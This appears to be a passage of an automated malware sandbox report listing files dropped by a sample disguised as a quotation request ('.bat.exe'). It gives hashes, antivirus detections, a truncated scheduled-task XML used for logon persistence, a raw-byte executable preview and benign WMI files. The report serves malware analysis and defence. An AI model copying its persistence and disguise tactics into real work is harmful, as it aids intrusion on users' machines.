                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1573
                                                                                                                      Entropy (8bit):5.098415912201418
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewkv:HeLwYrFdOFzOz6dKrsuqx
                                                                                                                      MD5:23461E4562AEEBF951201808EDB89320
                                                                                                                      SHA1:72D7B749B6258FB4E786645F3B638A06229D3B75
                                                                                                                      SHA-256:BDBBCE333850F4F331E1D770F9A4327F1CD958954954A9C01E4A30D4BE8D5E16
                                                                                                                      SHA-512:0BD3E3E206262C3CC43E57D1F9FBDAC578AF41C5E47BE05FD17E3A1194EA783A97DDE43A764BE402DDE1BA099558F0D563E9B803677B53B1FD3A404AF5FE5ABA
                                                                                                                      Malicious:true
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                                                                                      Process:C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1573
                                                                                                                      Entropy (8bit):5.098415912201418
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewkv:HeLwYrFdOFzOz6dKrsuqx
                                                                                                                      MD5:23461E4562AEEBF951201808EDB89320
                                                                                                                      SHA1:72D7B749B6258FB4E786645F3B638A06229D3B75
                                                                                                                      SHA-256:BDBBCE333850F4F331E1D770F9A4327F1CD958954954A9C01E4A30D4BE8D5E16
                                                                                                                      SHA-512:0BD3E3E206262C3CC43E57D1F9FBDAC578AF41C5E47BE05FD17E3A1194EA783A97DDE43A764BE402DDE1BA099558F0D563E9B803677B53B1FD3A404AF5FE5ABA
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                                                                                      Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1017856
                                                                                                                      Entropy (8bit):7.548057359158885
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Yij0gzjizxWgioJqE9p9jzOtXGnwaEalbcHNGtAlUDRL:1zjkW2H9p9PmXMOHNzUDB
                                                                                                                      MD5:1AE7A890014EBA9C807C6ADEABAC7671
                                                                                                                      SHA1:E3B92645849A3E064D9FC401BADF115DAB013839
                                                                                                                      SHA-256:BBA1825BD893328442CB891A35420A5DA41A5431D1ADE643F085C5992E763D3A
                                                                                                                      SHA-512:3A54469CAEB4052CB4B842B30292E5AE00C9BF2A29F0D293D975D7BD0283D657C2FB4C9FD0DF0797782EDA78474A9EAB5F8FA6D1FF66CEAF59F00E128FBAB2D7
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0..^...(.......|... ........@.. ....................................@..................................{..O........%........................................................................... ............... ..H............text...4\... ...^.................. ..`.rsrc....%.......&...`..............@..@.reloc..............................@..B.................|......H............3..........tJ..h1............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"
                                                                                                                      Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3444
                                                                                                                      Entropy (8bit):5.011954215267298
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                      MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                      Malicious:false
                                                                                                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48786
                                                                                                                      Entropy (8bit):3.5854495362228453
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                      Malicious:false
                                                                                                                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):840878
                                                                                                                      Entropy (8bit):3.4224066455051885
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                                                                                                      MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                                                                                                      SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                                                                                                      SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                                                                                                      SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                                                                                                      Malicious:false
                                                                                                                      Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):840878
                                                                                                                      Entropy (8bit):3.4224066455051885
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                                                                                                      MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                                                                                                      SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                                                                                                      SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                                                                                                      SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                                                                                                      Malicious:false
                                                                                                                      Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):137550
                                                                                                                      Entropy (8bit):3.409189992022338
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                                                                                                                      MD5:084B771A167854C5B38E25D4E199B637
                                                                                                                      SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                                                                                                                      SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                                                                                                                      SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                                                                                                                      Malicious:false
                                                                                                                      Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):715050
                                                                                                                      Entropy (8bit):3.278818886805871
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                                                                                                                      MD5:342BC94F85E143BE85B5B997163A0BB3
                                                                                                                      SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                                                                                                                      SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                                                                                                                      SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                                                                                                                      Malicious:false
                                                                                                                      Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3444
                                                                                                                      Entropy (8bit):5.011954215267298
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                      MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
